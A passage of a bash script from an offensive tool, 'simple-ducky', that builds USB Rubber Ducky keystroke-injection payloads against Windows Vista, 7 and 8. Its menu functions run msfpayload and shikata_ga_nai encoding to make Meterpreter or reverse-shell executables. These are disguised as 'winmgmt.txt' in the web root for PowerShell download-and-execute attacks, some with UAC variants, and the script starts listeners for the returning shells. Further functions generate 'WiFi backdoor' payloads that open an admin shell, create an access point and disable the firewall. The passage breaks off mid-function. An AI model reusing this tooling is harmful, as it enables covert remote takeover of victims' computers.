	read -p "Would you like me to setup a listener [y/n]? " listener
	clear
	if [ "$listener" == "n" ]; then
		read -p "Would you like to return to the main menu [y/n]? " option
	elif [ "$payloadtype" == "met" ]; then
		x-terminal-emulator -e msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$attackerip LPORT=$attackerport E &
		xdg-open /usr/share/simple-ducky/ &
		service apache2 start
		clear
		read -p "Would you like to return to the main menu [y/n]? " option
	else
		x-terminal-emulator -e ncat -lvp $attackerport &
		xdg-open /usr/share/simple-ducky/ &
		service apache2 start
		clear
		read -p "Would you like to return to the main menu [y/n]? " option
	fi

	case $option in
	y) simple-ducky ;;
	n) clear;exit ;;
	*) clear;exit ;;
	esac
}

#################################################################################
# Powershell Download & Execute w/UAC (Admin Priv Shell|Win Vista/7)
#################################################################################
f_powershellVIS7admuac(){
	clear
	echo -e "\e[1;31mDescription:\e[0m This payload uses Powershell to download and execute an evil payload"
	echo -e "\e[1;31mNote:\e[0m The evil payload is generated by Metasploit, and will provide ethier a Meterpreter or Standard Shell. The payload will automatically be dropped in your web (/var/www) directory and will be titled 'winmgmt.txt'. Once the payload is downloaded on the victim's machine it is converted to a .exe and run with Admin privileges."
	echo -e "\e[1;31mTarget:\e[0m Windows Vista/7 w/UAC Enabled"
	echo -e "\e[1;31mAuthor:\e[0m skysploit (Props to mubix for designing the orginal PD&E)"
	echo ""
	echo ""
	echo -e "\e[1;34mLets start by building your evil executable\e[0m"
	echo ""
	read -p "Where shall I send your shell? " attackerip
	echo ""
	read -p "What port will you be listening on? " attackerport
	echo -e ""
	read -p "Would you like a meterpreter or Ncat shell[met/nc]? " payloadtype
	clear
	echo -e "\e[1;34mMetasploit is generating your payload, this will take a moment...\e[0m"

	if [ "$payloadtype" == "met" ]; then
		msfpayload windows/meterpreter/reverse_tcp LHOST=$attackerip LPORT=$attackerport R |  msfencode -e x86/shikata_ga_nai -c 5 -t exe -o /var/www/winmgmt.txt
	else
		msfpayload windows/shell_reverse_tcp LHOST=$attackerip LPORT=$attackerport R |  msfencode -e x86/shikata_ga_nai -c 5 -t exe -o  /var/www/winmgmt.txt
	fi
	echo -e ""
	echo -e "\e[1;34mDone!\e[0m"
    sleep 3
    clear
	echo -e "\e[1;34mNow let's build your inject.bin\e[0m"
	echo ""
	echo -e "\e[1;34mWhat is the IP/Domain address for your webserver?\e[0m"
	read -p "[Example: www.example.com | www.example.com:port | $attackerip] " webserverip
	echo ""
	echo -e "How long of a delay would like before starting? "
	read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec
	echo ""
	clear
	echo -e "\e[1;34mPlease wait, generating your inject.bin\e[0m"
	echo ""
	sed "/http/s/domain/$webserverip/g" /usr/share/simple-ducky/payloads/powershellVIS7admuac.conf > /usr/share/simple-ducky/payload.txt
	sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt
	clear
	read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language
	if [ "$language" == "o" ]; then
  	function_lan
		read -p "Option: " keyboard
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt  -l $keyboard -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		echo -e "\e[1;34mYour evil executable has been created, it is in located at /var/www/winmgmt.txt\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	else
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		echo -e "\e[1;34mYour evil executable has been created, it is in located at /var/www/winmgmt.txt\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	fi
	clear
	read -p "Would you like me to setup a listener [y/n]? " listener
	clear
	if [ "$listener" == "n" ]; then
		read -p "Would you like to return to the main menu [y/n]? " option
	elif [ "$payloadtype" == "met" ]; then
		x-terminal-emulator -e msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$attackerip LPORT=$attackerport E &
		xdg-open /usr/share/simple-ducky/ &
		service apache2 start
		clear
		read -p "Would you like to return to the main menu [y/n]? " option
	else
		x-terminal-emulator -e ncat -lvp $attackerport &
		xdg-open /usr/share/simple-ducky/ &
		service apache2 start
		clear
		read -p "Would you like to return to the main menu [y/n]? " option
	fi

	case $option in
	y) simple-ducky ;;
	n) clear;exit ;;
	*) clear;exit ;;
	esac
}

#################################################################################
# Powershell Download & Execute w/o UAC (Admin Priv Shell|Win Vista/7)
#################################################################################
f_powershellVIS7admnouac(){
	clear
	echo -e "\e[1;31mDescription:\e[0m This payload uses Powershell to download and execute an evil payload"
	echo -e "\e[1;31mNote:\e[0m The evil payload is generated by Metasploit, and will provide ethier a Meterpreter or Standard Shell. The payload will automatically be dropped in your web (/var/www) directory and will be titled 'winmgmt.txt'. Once the payload is downloaded on the victim's machine it is converted to a .exe and run with Admin privileges."
	echo -e "\e[1;31mTarget:\e[0m Windows Vista/7 w/o UAC Enabled"
	echo -e "\e[1;31mAuthor:\e[0m skysploit (Props to mubix for designing the orginal PD&E)"
	echo ""
	echo ""
	echo -e "\e[1;34mLets start by building your evil executable\e[0m"
	echo ""
	read -p "Where shall I send your shell? " attackerip
	echo ""
	read -p "What port will you be listening on? " attackerport
	echo -e ""
	read -p "Would you like a meterpreter or Ncat shell[met/nc]? " payloadtype
	clear
	echo -e "\e[1;34mMetasploit is generating your payload, this will take a moment...\e[0m"

	if [ "$payloadtype" == "met" ]; then
		msfpayload windows/meterpreter/reverse_tcp LHOST=$attackerip LPORT=$attackerport R |  msfencode -e x86/shikata_ga_nai -c 5 -t exe -o /var/www/winmgmt.txt
	else
		msfpayload windows/shell_reverse_tcp LHOST=$attackerip LPORT=$attackerport R |  msfencode -e x86/shikata_ga_nai -c 5 -t exe -o  /var/www/winmgmt.txt
	fi
	echo -e ""
	echo -e "\e[1;34mDone!\e[0m"
    sleep 3
    clear
	echo -e "\e[1;34mNow let's build your inject.bin\e[0m"
	echo ""
	echo -e "\e[1;34mWhat is the IP/Domain address for your webserver?\e[0m"
	read -p "[Example: www.example.com | www.example.com:port | $attackerip] " webserverip
	echo ""
	echo -e "How long of a delay would like before starting? "
	read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec
	echo ""
	clear
	echo -e "\e[1;34mPlease wait, generating your inject.bin\e[0m"
	echo ""
	sed "/http/s/domain/$webserverip/g" /usr/share/simple-ducky/payloads/powershellVIS7admnouac.conf > /usr/share/simple-ducky/payload.txt
	sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt
	clear
	read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language
	if [ "$language" == "o" ]; then
		function_lan
		read -p "Option: " keyboard
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt  -l $keyboard -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		echo -e "\e[1;34mYour evil executable has been created, it is in located at /var/www/winmgmt.txt\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	else
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		echo -e "\e[1;34mYour evil executable has been created, it is in located at /var/www/winmgmt.txt\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	fi
	clear
	read -p "Would you like me to setup a listener [y/n]? " listener
	clear
	if [ "$listener" == "n" ]; then
		read -p "Would you like to return to the main menu [y/n]? " option
	elif [ "$payloadtype" == "met" ]; then
		x-terminal-emulator -e msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$attackerip LPORT=$attackerport E &
		xdg-open /usr/share/simple-ducky/ &
		service apache2 start
		clear
		read -p "Would you like to return to the main menu [y/n]? " option
	else
		x-terminal-emulator -e ncat -lvp $attackerport &
		xdg-open /usr/share/simple-ducky/ &
		service apache2 start
		clear
		read -p "Would you like to return to the main menu [y/n]? " option
	fi

	case $option in
	y) simple-ducky ;;
	n) clear;exit ;;
	*) clear;exit ;;
	esac
}

#################################################################################
# Powershell Download & Execute (User Priv Shell|Win 8)
#################################################################################
f_powershellWIN8(){
	clear
	echo -e "\e[1;31mDescription:\e[0m This payload uses Powershell to download and execute an evil payload"
	echo -e "\e[1;31mNote:\e[0m The evil payload is generated by Metasploit, and will provide either a Meterpreter or Standard shell. The payload will automatically be dropped in your web (/var/www) directory and will be titled 'winmgmt.txt'. Once the payload is downloaded on the victim's machine it is converted to a .exe and run with user privileges."
	echo -e "\e[1;31mTarget:\e[0m Windows 8"
	echo -e "\e[1;31mAuthor:\e[0m mubix"
	echo ""
	echo ""
	echo -e "\e[1;34mLets start by building your evil executable\e[0m"
	echo ""
	read -p "Where shall I send your shell? " attackerip
	echo ""
	read -p "What port will you be listening on? " attackerport
	echo -e ""
	read -p "Would you like a meterpreter or Ncat shell[met/nc]? " payloadtype
	clear
	echo -e "\e[1;34mMetasploit is generating your payload, this will take a moment...\e[0m"

	if [ "$payloadtype" == "met" ]; then
		msfpayload windows/meterpreter/reverse_tcp LHOST=$attackerip LPORT=$attackerport R |  msfencode -e x86/shikata_ga_nai -c 5 -t exe -o /var/www/winmgmt.txt
	else
		msfpayload windows/shell_reverse_tcp LHOST=$attackerip LPORT=$attackerport R |  msfencode -e x86/shikata_ga_nai -c 5 -t exe -o  /var/www/winmgmt.txt
	fi

	echo -e ""
	echo -e "\e[1;34mDone!\e[0m"
    sleep 3
    clear
	echo -e "\e[1;34mNow let's build your inject.bin\e[0m"
	echo ""
	echo -e "\e[1;34mWhat is the IP/Domain address for your webserver?\e[0m"
	read -p "[Example: www.example.com | www.example.com:port | $attackerip] " webserverip
	echo ""
	echo -e "How long of a delay would like before starting? "
	read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec
	clear
	echo -e "\e[1;34mPlease wait, generating your inject.bin\e[0m"
	echo ""
	sed "/http/s/domain/$webserverip/g" /usr/share/simple-ducky/payloads/powershellWIN8.conf > /usr/share/simple-ducky/payload.txt
	sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt
	clear
	read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language
	if [ "$language" == "o" ]; then
    function_lan
		read -p "Option: " keyboard
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt  -l $keyboard -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		echo -e "\e[1;34mYour evil executable has been created, it is in located at /var/www/winmgmt.txt\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	else
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		echo -e "\e[1;34mYour evil executable has been created, it is in located at /var/www/winmgmt.txt\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	fi
	clear
	read -p "Would you like me to setup a listener [y/n]? " listener
	clear
	if [ "$listener" == "n" ]; then
		read -p "Would you like to return to the main menu [y/n]? " option
	elif [ "$payloadtype" == "met" ]; then
		x-terminal-emulator -e msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$attackerip LPORT=$attackerport E &
		xdg-open /usr/share/simple-ducky/ &
		service apache2 start
		clear
		read -p "Would you like to return to the main menu [y/n]? " option
	else
		x-terminal-emulator -e ncat -lvp $attackerport &
		xdg-open /usr/share/simple-ducky/ &
		service apache2 start
		clear
		read -p "Would you like to return to the main menu [y/n]? " option
	fi

	case $option in
	y) simple-ducky ;;
	n) clear;exit ;;
	*) clear;exit ;;
	esac
}

#################################################################################
# Powershell Download & Execute w/UAC (Admin Priv Shell|Win 8)
#################################################################################
f_powershellWIN8admuac(){
	clear
	echo -e "\e[1;31mDescription:\e[0m This payload uses Powershell to download and execute an evil payload"
	echo -e "\e[1;31mNote:\e[0m The evil payload is generated by Metasploit, and will provide ethier a Meterpreter or Standard Shell. The payload will automatically be dropped in your web (/var/www) directory and will be titled 'winmgmt.txt'. Once the payload is downloaded on the victim's machine it is converted to a .exe and run with Admin privileges."
	echo -e "\e[1;31mTarget:\e[0m Windows 8 w/UAC Enabled"
	echo -e "\e[1;31mAuthor:\e[0m skysploit (Props to mubix for designing the orginal PD&E)"
	echo ""
	echo ""
	echo -e "\e[1;34mLets start by building your evil executable\e[0m"
	echo ""
	read -p "Where shall I send your shell? " attackerip
	echo ""
	read -p "What port will you be listening on? " attackerport
	echo -e ""
	read -p "Would you like a meterpreter or Ncat shell[met/nc]? " payloadtype
	clear
	echo -e "\e[1;34mMetasploit is generating your payload, this will take a moment...\e[0m"

	if [ "$payloadtype" == "met" ]; then
		msfpayload windows/meterpreter/reverse_tcp LHOST=$attackerip LPORT=$attackerport R |  msfencode -e x86/shikata_ga_nai -c 5 -t exe -o /var/www/winmgmt.txt
	else
		msfpayload windows/shell_reverse_tcp LHOST=$attackerip LPORT=$attackerport R |  msfencode -e x86/shikata_ga_nai -c 5 -t exe -o  /var/www/winmgmt.txt
	fi
	echo -e ""
	echo -e "\e[1;34mDone!\e[0m"
    sleep 3
    clear
	echo -e "\e[1;34mNow let's build your inject.bin\e[0m"
	echo ""
	echo -e "\e[1;34mWhat is the IP/Domain address for your webserver?\e[0m"
	read -p "[Example: www.example.com | www.example.com:port | $attackerip] " webserverip
	echo ""
	echo -e "How long of a delay would like before starting? "
	read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec
	echo ""
	clear
	echo -e "\e[1;34mPlease wait, generating your inject.bin\e[0m"
	echo ""
	sed "/http/s/domain/$webserverip/g" /usr/share/simple-ducky/payloads/powershellWIN8admuac.conf > /usr/share/simple-ducky/payload.txt
	sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt
	clear
	read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language
	if [ "$language" == "o" ]; then
	  function_lan
		read -p "Option: " keyboard
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt  -l $keyboard -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		echo -e "\e[1;34mYour evil executable has been created, it is in located at /var/www/winmgmt.txt\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	else
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		echo -e "\e[1;34mYour evil executable has been created, it is in located at /var/www/winmgmt.txt\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	fi
	clear
	read -p "Would you like me to setup a listener [y/n]? " listener
	clear
	if [ "$listener" == "n" ]; then
		read -p "Would you like to return to the main menu [y/n]? " option
	elif [ "$payloadtype" == "met" ]; then
		x-terminal-emulator -e msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$attackerip LPORT=$attackerport E &
		xdg-open /usr/share/simple-ducky/ &
		service apache2 start
		clear
		read -p "Would you like to return to the main menu [y/n]? " option
	else
		x-terminal-emulator -e ncat -lvp $attackerport &
		xdg-open /usr/share/simple-ducky/ &
		service apache2 start
		clear
		read -p "Would you like to return to the main menu [y/n]? " option
	fi

	case $option in
	y) simple-ducky ;;
	n) clear;exit ;;
	*) clear;exit ;;
	esac
}

#################################################################################
# Powershell Download & Execute w/o UAC (Admin Priv Shell|Win 8)
#################################################################################
f_powershellWIN8admnouac(){
	clear
	echo -e "\e[1;31mDescription:\e[0m This payload uses Powershell to download and execute an evil payload"
	echo -e "\e[1;31mNote:\e[0m The evil payload is generated by Metasploit, and will provide ethier a Meterpreter or Standard Shell. The payload will automatically be dropped in your web (/var/www) directory and will be titled 'winmgmt.txt'. Once the payload is downloaded on the victim's machine it is converted to a .exe and run with Admin privileges."
	echo -e "\e[1;31mTarget:\e[0m Windows 8 w/o UAC Enabled"
	echo -e "\e[1;31mAuthor:\e[0m skysploit (Props to mubix for designing the orginal PD&E)"
	echo ""
	echo ""
	echo -e "\e[1;34mLets start by building your evil executable\e[0m"
	echo ""
	read -p "Where shall I send your shell? " attackerip
	echo ""
	read -p "What port will you be listening on? " attackerport
	echo -e ""
	read -p "Would you like a meterpreter or Ncat shell[met/nc]? " payloadtype
	clear
	echo -e "\e[1;34mMetasploit is generating your payload, this will take a moment...\e[0m"

	if [ "$payloadtype" == "met" ]; then
		msfpayload windows/meterpreter/reverse_tcp LHOST=$attackerip LPORT=$attackerport R |  msfencode -e x86/shikata_ga_nai -c 5 -t exe -o /var/www/winmgmt.txt
	else
		msfpayload windows/shell_reverse_tcp LHOST=$attackerip LPORT=$attackerport R |  msfencode -e x86/shikata_ga_nai -c 5 -t exe -o  /var/www/winmgmt.txt
	fi
	echo -e ""
	echo -e "\e[1;34mDone!\e[0m"
    sleep 3
    clear
	echo -e "\e[1;34mNow let's build your inject.bin\e[0m"
	echo ""
	echo -e "\e[1;34mWhat is the IP/Domain address for your webserver?\e[0m"
	read -p "[Example: www.example.com | www.example.com:port | $attackerip] " webserverip
	echo ""
	echo -e "How long of a delay would like before starting? "
	read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec
	echo ""
	clear
	echo -e "\e[1;34mPlease wait, generating your inject.bin\e[0m"
	echo ""
	sed "/http/s/domain/$webserverip/g" /usr/share/simple-ducky/payloads/powershellWIN8admnouac.conf > /usr/share/simple-ducky/payload.txt
	sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt
	clear
	read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language
	if [ "$language" == "o" ]; then
	  function_lan
		read -p "Option: " keyboard
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt  -l $keyboard -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		echo -e "\e[1;34mYour evil executable has been created, it is in located at /var/www/winmgmt.txt\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	else
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		echo -e "\e[1;34mYour evil executable has been created, it is in located at /var/www/winmgmt.txt\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	fi
	clear
	read -p "Would you like me to setup a listener [y/n]? " listener
	clear
	if [ "$listener" == "n" ]; then
		read -p "Would you like to return to the main menu [y/n]? " option
	elif [ "$payloadtype" == "met" ]; then
		x-terminal-emulator -e msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$attackerip LPORT=$attackerport E &
		xdg-open /usr/share/simple-ducky/ &
		service apache2 start
		clear
		read -p "Would you like to return to the main menu [y/n]? " option
	else
		x-terminal-emulator -e ncat -lvp $attackerport &
		xdg-open /usr/share/simple-ducky/ &
		service apache2 start
		clear
		read -p "Would you like to return to the main menu [y/n]? " option
	fi

	case $option in
	y) simple-ducky ;;
	n) clear;exit ;;
	*) clear;exit ;;
	esac
}

#################################################################################
#################################################################################
#
# Wifi Attacks
#
#################################################################################
#################################################################################

#################################################################################
# WiFi Backdoor w/UAC (Win Vista/7)
#################################################################################
f_wifibackdoorVIS7uac(){
	clear
	echo -e "\e[1;31mDescription:\e[0m This payload opens an Administrative cmd.exe session, then creates a wireless access point and disables the firewall"
	echo -e "\e[1;31mTarget:\e[0m Windows Vista/7 w/UAC Enabled"
	echo -e "\e[1;31mAuthor:\e[0m Darren Kitchen"
	echo ""
	echo ""
	echo -e ""
	read -p "What would you like the SSID to be? " attackerssid
	echo ""
	read -p "What would you like the AP's key to be? " attackerkey
	echo ""
	echo -e "How long of a delay would like before starting? "
	read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec
	echo ""
	clear
	echo -e "\e[1;34mAlmost done. Let's set your keyboard languagee\e[0m"
	echo ""
	sed "/STRING/s/attackerssid/$attackerssid/g" /usr/share/simple-ducky/payloads/wifibackdoorVIS7uac.conf > /usr/share/simple-ducky/payload_del.txt
	sed "/STRING/s/attackerkey/$attackerkey/g" /usr/share/simple-ducky/payload_del.txt > /usr/share/simple-ducky/payload.txt
	sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt
	rm /usr/share/simple-ducky/payload_del.txt
	clear
	read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language
	if [ "$language" == "o" ]; then
	  function_lan
		read -p "Option: " keyboard
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt  -l $keyboard -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	else
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	fi
	clear
	xdg-open /usr/share/simple-ducky/ &
	clear
	read -p "Would you like to return to the main menu [y/n]? " option
	clear

	case $option in
	y) simple-ducky ;;
	n) clear;exit ;;
	*) clear;exit ;;
	esac
}

#################################################################################
# WiFi Backdoor w/o UAC (Win Vista/7)
#################################################################################
f_wifibackdoorVIS7nouac(){
	clear
	echo -e "\e[1;31mDescription:\e[0m This payload opens an Administrative cmd.exe session, then creates a wireless access point and disables the firewall"
	echo -e "\e[1;31mTarget:\e[0m Windows Vista/7 w/o UAC Enabled"
	echo -e "\e[1;31mAuthor:\e[0m Darren Kitchen"
	echo ""
	echo ""
	echo -e ""
	read -p "What would you like the SSID to be? " attackerssid
	echo ""
	read -p "What would you like the AP's key to be? " attackerkey
	echo ""
	echo -e "How long of a delay would like before starting? "
	read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec
	echo ""
	clear
	echo -e "\e[1;34mAlmost done. Let's set your keyboard languagee\e[0m"
	echo ""
	sed "/STRING/s/attackerssid/$attackerssid/g" /usr/share/simple-ducky/payloads/wifibackdoorVIS7nouac.conf > /usr/share/simple-ducky/payload_del.txt
	sed "/STRING/s/attackerkey/$attackerkey/g" /usr/share/simple-ducky/payload_del.txt > /usr/share/simple-ducky/payload.txt
	sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt
	rm /usr/share/simple-ducky/payload_del.txt
	clear
	read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language
	if [ "$language" == "o" ]; then
    function_lan
		read -p "Option: " keyboard
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt  -l $keyboard -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	else
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	fi
	clear
	xdg-open /usr/share/simple-ducky/ &
	clear
	read -p "Would you like to return to the main menu [y/n]? " option
	clear

	case $option in
	y) simple-ducky ;;
	n) clear;exit ;;
	*) clear;exit ;;
	esac
}

#################################################################################
# WiFi Backdoor w/UAC (Win 8)
#################################################################################
f_wifibackdoorWIN8uac(){
	clear
	echo -e "\e[1;31mDescription:\e[0m This payload opens an Administrative cmd.exe session, then creates a wireless access point and disables the firewall"
	echo -e "\e[1;31mTarget:\e[0m Windows 8 w/UAC Enabled"
	echo -e "\e[1;31mAuthor:\e[0m Darren Kitchen"
	echo ""
	echo ""
	echo -e ""
	read -p "What would you like the SSID to be? " attackerssid
	echo ""
	read -p "What would you like the AP's key to be? " attackerkey
	echo ""
	echo -e "How long of a delay would like before starting? "
	read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec
	echo ""
	clear
	echo -e "\e[1;34mAlmost done. Let's set your keyboard languagee\e[0m"
	echo ""
	sed "/STRING/s/attackerssid/$attackerssid/g" /usr/share/simple-ducky/payloads/wifibackdoorWIN8uac.conf > /usr/share/simple-ducky/payload_del.txt
	sed "/STRING/s/attackerkey/$attackerkey/g" /usr/share/simple-ducky/payload_del.txt > /usr/share/simple-ducky/payload.txt
	sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt
	rm /usr/share/simple-ducky/payload_del.txt
	clear
	read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language
	if [ "$language" == "o" ]; then
		function_lan
		read -p "Option: " keyboard
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt  -l $keyboard -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	else
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	fi
	clear
	xdg-open /usr/share/simple-ducky/ &
	clear
	read -p "Would you like to return to the main menu [y/n]? " option
	clear

	case $option in
	y) simple-ducky ;;
	n) clear;exit ;;
	*) clear;exit ;;
	esac
}

#################################################################################
# WiFi Backdoor w/o UAC (Win 8)
#################################################################################
f_wifibackdoorWIN8nouac(){
	clear
	echo -e "\e[1;31mDescription:\e[0m This payload opens an Administrative cmd.exe session, then creates a wireless access point and disables the firewall"
	echo -e "\e[1;31mTarget:\e[0m Windows 8 w/o UAC Enabled"
	echo -e "\e[1;31mAuthor:\e[0m Darren Kitchen"
	echo ""
	echo ""
	echo -e ""
	read -p "What would you like the SSID to be? " attackerssid
	echo ""
	read -p "What would you like the AP's key to be? " attackerkey
	echo ""
	echo -e "How long of a delay would like before starting? "
	read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec
	echo ""
	clear
	echo -e "\e[1;34mAlmost done. Let's set your keyboard languagee\e[0m"
	echo ""
	sed "/STRING/s/attackerssid/$attackerssid/g" /usr/share/simple-ducky/payloads/wifibackdoorWIN8nouac.conf > /usr/share/simple-ducky/payload_del.txt
	sed "/STRING/s/attackerkey/$attackerkey/g" /usr/share/simple-ducky/payload_del.txt > /usr/share/simple-ducky/payload.txt
	sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt
	rm /usr/share/simple-ducky/payload_del.txt
	clear
	read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language
	if [ "$language" == "o" ]; then
    function_lan
		read -p "Option: " keyboard
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt  -l $keyboard -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	else
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	fi
	clear
	xdg-open /usr/share/simple-ducky/ &
	clear
	read -p "Would you like to return to the main menu [y/n]? " option
	clear

	case $option in
	y) simple-ducky ;;
	n) clear;exit ;;
	*) clear;exit ;;
	esac
}

#################################################################################
# WiFi Autoconnect w/UAC (Designed for the WiFi Pineapple | Win Vista/7)
#################################################################################
f_wifiautoconnectVIS7uac(){
	clear
	echo -e "\e[1;31mDescription:\e[0m Downloads an xml file from pastebin (using Mubix’ powershell code) and the adds it to the wireless profiles using netsh."
	echo -e "\e[1;31mNote:\e[0m The autoconnect acess point will be set to - Pineapple"
	echo -e "\e[1;31mOptions:\e[0m You might want to change the name of the access point, but you’ll need to upload your own xml. Just modify the 'wifi_autoconnect.con' file in the /usr/share/simple-ducky/payloads/ directory"
	echo -e "\e[1;31mTarget:\e[0m Windows Vista/7 w/UAC Enabled"
	echo -e "\e[1;31mAuthor:\e[0m Xcellerator"
	echo -e ""
	echo ""
	echo -e "How long of a delay would like before starting? "
	read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec
	echo ""
	echo
	clear
	cp /usr/share/simple-ducky/payloads/wifiautoconnectVIS7uac.conf /usr/share/simple-ducky/payload.txt
	sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt
	clear
